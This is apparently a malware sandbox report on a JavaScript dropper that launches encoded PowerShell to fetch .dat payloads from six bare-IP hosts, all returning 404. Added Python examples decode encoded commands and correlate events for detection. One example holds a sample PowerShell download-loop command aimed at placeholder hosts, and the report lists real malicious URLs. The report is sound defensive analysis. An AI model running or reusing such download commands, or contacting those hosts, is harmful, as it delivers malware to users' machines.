File name: | DETAILSS[nc3].js |
Full analysis: | https://app.any.run/tasks/6e020383-47dc-4bcb-b1f4-c702d418b7a5 |
Verdict: | Malicious activity |
Analysis date: | March 31, 2023, 23:47:47 |
OS: | Windows 10 Professional (build: 19044, 64 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with CRLF line terminators |
MD5: | 085CE0466ED3F90300218734291F616F |
SHA1: | 84B7E7B565C02042E1E82D458EA2AED3596D7B66 |
SHA256: | DF56FA2455A4934B13F052EE99D6DDF07E0C8E9A0E574299F4BA6EB471A7751A |
SSDEEP: | 1536:FmLC7X6Ss/YPqBhImXFb/S54A2e6R3rlBgj9jk1yiG80tqf0pOERwULD9xMS4h/4:FmLC7X6Ss/YPqBhImXFb/S54A2e6R3rk |
PID | CMD | Path | Indicators | Parent process | User | Company | Integrity level | Description | Exit code | Version
---|---|---|---|---|---|---|---|---|---|---
5364 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Downloads\DETAILSS[nc3].js" | C:\Windows\System32\wscript.exe | — | explorer.exe | admin | Microsoft Corporation | MEDIUM | Microsoft ® Windows Based Script Host | 0 | 5.812.10240.16384
648 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "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" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | wscript.exe | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 0 | 10.0.19041.1 (WinBuild.160101.0800)
4192 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | admin | Microsoft Corporation | MEDIUM | Console Window Host | 0 | 10.0.19041.1 (WinBuild.160101.0800)
2836 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | | svchost.exe | admin | Microsoft Corporation | MEDIUM | Windows Activation Client | 0 | 10.0.19041.1 (WinBuild.160101.0800)
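The powershell.exe row above shows the script host handing execution to PowerShell through -encodedcommand; the argument itself is redacted in this report. The following is an added example, not part of the ANY.RUN report or of the sample, showing the decode step an analyst applies to such a blob: -EncodedCommand is Base64 over the UTF-16LE bytes of the script, so decoding the bytes as UTF-8 produces NUL-interleaved text. The plaintext, the command line and the URLs in it are constructed placeholders (RFC 5737 documentation addresses), not values recovered from this sample.

```python
"""Decode a powershell.exe -EncodedCommand argument and pull URL IOCs out of it."""
import base64
import re
from typing import Optional

# Constructed stand-in for the redacted blob in the report: a two-URL download
# loop of the kind a script-host dropper hands to PowerShell. The URLs use
# RFC 5737 documentation addresses and are not taken from the sample.
SAMPLE_PLAINTEXT = (
    "$u='http://192.0.2.10/abc123.dat','http://198.51.100.7/def456.dat';"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadString($x);break}catch{}}"
)
# -EncodedCommand is Base64 over the UTF-16LE bytes of the script; this is how
# the blob below is produced.
SAMPLE_ENCODED = base64.b64encode(SAMPLE_PLAINTEXT.encode("utf-16-le")).decode("ascii")
SAMPLE_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    f'-encodedcommand "{SAMPLE_ENCODED}"'
)

# Spellings of the switch that powershell.exe accepts (it takes unambiguous prefixes).
ENCODED_FLAG_RE = re.compile(
    r"""-e(?:c|nc|ncodedcommand)?\s+["']?([A-Za-z0-9+/=]+)""", re.IGNORECASE
)
URL_RE = re.compile(r"""https?://[^\s'"<>;,)]+""", re.IGNORECASE)


def extract_encoded_blob(cmdline: str) -> Optional[str]:
    """Return the Base64 argument of -EncodedCommand, or None if the command line has none."""
    m = ENCODED_FLAG_RE.search(cmdline)
    return m.group(1) if m else None


def decode_encoded_command(blob: str) -> str:
    """Decode the blob the way PowerShell does: Base64, then UTF-16LE. Decoding the
    bytes as UTF-8 instead gives every character interleaved with NUL, the usual
    sign that the wrong step was applied."""
    raw = base64.b64decode(blob, validate=True)
    if len(raw) % 2:
        raise ValueError("not UTF-16LE: odd byte count")
    return raw.decode("utf-16-le")


def iocs_from_cmdline(cmdline: str) -> dict:
    """Decode an encoded PowerShell command line and list the URLs it references."""
    blob = extract_encoded_blob(cmdline)
    if blob is None:
        return {"decoded": None, "urls": []}
    decoded = decode_encoded_command(blob)
    return {"decoded": decoded, "urls": sorted(set(URL_RE.findall(decoded)))}


if __name__ == "__main__":
    result = iocs_from_cmdline(SAMPLE_CMDLINE)
    print(result["decoded"])
    for url in result["urls"]:
        print("IOC:", url)
```

Run against a real command line from process-creation telemetry, the decoded script is what should be read for the download targets and the fallback order, rather than the Base64 string itself.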
PID | Process | Key | Operation | Name | Value
---|---|---|---|---|---
5364 | wscript.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | ProxyBypass | 1
5364 | wscript.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | IntranetName | 1
5364 | wscript.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | UNCAsIntranet | 1
5364 | wscript.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | AutoDetect | 0
648 | powershell.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | ProxyBypass | 1
648 | powershell.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | IntranetName | 1
648 | powershell.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | UNCAsIntranet | 1
648 | powershell.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | AutoDetect | 0

These four ZoneMap values are written by the Windows Internet zone manager when a process first initialises it, which both wscript.exe and powershell.exe do before issuing HTTP requests; they are a side effect of the download attempts, not a persistence mechanism or a deliberate proxy change, and on their own carry little weight.
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
648 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_fgrfppkf.qoe.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
648 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vdtripa4.1e1.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
648 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | 3107623B43F783E7C296C2ED4A31BC7F | E40B62B010330546263C5AB6615A69ABEE011D5C7CF65AD7CF29CAD97DD3D8A5
648 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | text | 1ACADA3C580D8D7AB5D8C84B136C78F1 | 1D4C4668DC6191C5C0B132D76740E086EC867304A736C82CA26AC5B026295207

All four are PowerShell's own start-up artefacts: the __PSScriptPolicyTest_* pair is written to probe whether an AppLocker or WDAC script policy is enforced, StartupProfileData caches the non-interactive profile, and the CLR UsageLogs entry is the .NET loader's log. None is a dropped payload, which matches the 404 on every download attempt in the HTTP table.
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
648 | powershell.exe | GET | 404 | 94.131.117.111:80 | http://94.131.117.111/LFkYwfXrGkXX.dat | US | xml | 341 b | malicious |
648 | powershell.exe | GET | 404 | 199.247.30.203:80 | http://199.247.30.203/m27Us1TtRcfC.dat | NL | xml | 341 b | malicious |
648 | powershell.exe | GET | 404 | 104.225.129.114:80 | http://104.225.129.114/8xDWD6bYSUPC.dat | US | xml | 341 b | malicious |
648 | powershell.exe | GET | 404 | 85.239.41.205:80 | http://85.239.41.205/jdlg0WO.dat | CY | xml | 341 b | malicious |
648 | powershell.exe | GET | 404 | 141.94.86.90:80 | http://141.94.86.90/SIez1KdorkWo.dat | FR | xml | 341 b | malicious |
648 | powershell.exe | GET | 404 | 216.146.25.129:80 | http://216.146.25.129/wDtNL6d.dat | US | xml | 341 b | malicious |
3128 | slui.exe | POST | — | 52.161.91.37:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | US | — | — | whitelisted |
2836 | slui.exe | POST | — | 52.161.91.37:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | US | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 4.231.128.59:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
648 | powershell.exe | 85.239.41.205:80 | — | Cloudlayer8 Limited | CY | malicious |
648 | powershell.exe | 141.94.86.90:80 | — | OVH SAS | FR | malicious |
648 | powershell.exe | 216.146.25.129:80 | — | CLOUDIE-NETWORKS-LLC | US | malicious |
648 | powershell.exe | 104.225.129.114:80 | — | SHOCK-1 | US | malicious |
648 | powershell.exe | 94.131.117.111:80 | — | ZAYO-6461 | US | malicious |
5952 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
5288 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
1740 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
648 | powershell.exe | 199.247.30.203:80 | — | AS-CHOOPA | NL | malicious |
Domain | IP | Reputation
---|---|---
settings-win.data.microsoft.com | | whitelisted
activation-v2.sls.microsoft.com | | whitelisted
self.events.data.microsoft.com | | whitelisted
PID | Process | Class | Message |
---|---|---|---|
648 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
648 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
648 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
648 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
648 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
648 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
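Each row in the threats table above is the same informational rule firing once per request on the PowerShell user agent, and the IDS rates every one of them as Not Suspicious in isolation. As an added example that is not part of the report, the Python below correlates constructed process and HTTP events modelled on this analysis (Sysmon-style field names are an assumption; the IPs and URLs are the ones in the report's tables, the encoded blob is a placeholder since it is redacted above) to flag the two behaviours that together make this sample malicious: a script host launching PowerShell with an encoded command, and that PowerShell requesting the same file type from several bare-IP hosts in turn, every request returning 404 so that no second stage was retrieved in this run.

```python
"""Correlate process-creation and HTTP events to flag the behaviour chain in this report."""
from collections import defaultdict
from ipaddress import ip_address
from typing import Dict, List
from urllib.parse import urlsplit

# Constructed sample events modelled on the report (Sysmon-style field names are
# an assumption; these are not real log lines). IPs and URLs are those in the
# report's HTTP table; the encoded blob is redacted there, so it is a placeholder.
PROCESS_EVENTS = [
    {"pid": 5364, "image": "wscript.exe", "parent_image": "explorer.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\admin\Downloads\DETAILSS[nc3].js"'},
    {"pid": 648, "image": "powershell.exe", "parent_image": "wscript.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "<redacted>"'},
    {"pid": 4192, "image": "conhost.exe", "parent_image": "powershell.exe",
     "cmdline": r"\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 2836, "image": "slui.exe", "parent_image": "svchost.exe",
     "cmdline": r"C:\WINDOWS\System32\slui.exe -Embedding"},
]

HTTP_EVENTS = [
    {"pid": 648, "image": "powershell.exe", "method": "GET", "status": 404, "url": "http://94.131.117.111/LFkYwfXrGkXX.dat"},
    {"pid": 648, "image": "powershell.exe", "method": "GET", "status": 404, "url": "http://199.247.30.203/m27Us1TtRcfC.dat"},
    {"pid": 648, "image": "powershell.exe", "method": "GET", "status": 404, "url": "http://104.225.129.114/8xDWD6bYSUPC.dat"},
    {"pid": 648, "image": "powershell.exe", "method": "GET", "status": 404, "url": "http://85.239.41.205/jdlg0WO.dat"},
    {"pid": 648, "image": "powershell.exe", "method": "GET", "status": 404, "url": "http://141.94.86.90/SIez1KdorkWo.dat"},
    {"pid": 648, "image": "powershell.exe", "method": "GET", "status": 404, "url": "http://216.146.25.129/wDtNL6d.dat"},
    {"pid": 2836, "image": "slui.exe", "method": "POST", "status": None,
     "url": "https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Spellings of -EncodedCommand that powershell.exe accepts (it allows unambiguous prefixes).
ENCODED_FLAGS = ("-e ", "-ec ", "-enc ", "-encodedcommand ")


def encoded_powershell_from_script_host(events: List[dict]) -> List[int]:
    """Rule 1: powershell.exe whose parent is a script host and whose command line
    carries an encoded command. Returns the matching PIDs."""
    hits = []
    for e in events:
        if e["image"].lower() != "powershell.exe":
            continue
        if e["parent_image"].lower() not in SCRIPT_HOSTS:
            continue
        if any(flag in e["cmdline"].lower() for flag in ENCODED_FLAGS):
            hits.append(e["pid"])
    return hits


def _is_raw_ip(host: str) -> bool:
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def raw_ip_fallback_downloads(events: List[dict], min_hosts: int = 3) -> Dict[int, dict]:
    """Rule 2: one process issuing GETs for the same file extension to at least
    min_hosts distinct bare-IP hosts, consistent with a hard-coded fallback list.
    The per-request IDS rule cannot see this; the signal is in the repetition."""
    per_pid = defaultdict(lambda: defaultdict(list))
    for e in events:
        if e["method"].upper() != "GET":
            continue
        parts = urlsplit(e["url"])
        host = parts.hostname or ""
        if not _is_raw_ip(host):
            continue
        ext = parts.path.rsplit(".", 1)[-1].lower() if "." in parts.path else ""
        per_pid[e["pid"]][ext].append(e)
    findings = {}
    for pid, by_ext in per_pid.items():
        for ext, reqs in by_ext.items():
            hosts = sorted({urlsplit(r["url"]).hostname for r in reqs})
            if len(hosts) >= min_hosts:
                findings[pid] = {
                    "extension": ext,
                    "hosts": hosts,
                    # True when every attempt failed, i.e. no second stage was fetched.
                    "all_failed": all(r["status"] is not None and r["status"] >= 400 for r in reqs),
                }
    return findings


def triage(process_events: List[dict], http_events: List[dict]) -> dict:
    """Run both rules and return their findings keyed by rule."""
    return {
        "encoded_powershell_pids": encoded_powershell_from_script_host(process_events),
        "fallback_downloads": raw_ip_fallback_downloads(http_events),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(PROCESS_EVENTS, HTTP_EVENTS), indent=2))
```

The slui.exe activation POST is ignored by both rules (domain host, not GET), which is the intended behaviour: Windows activation traffic appears in the same capture and is whitelisted in the connections table.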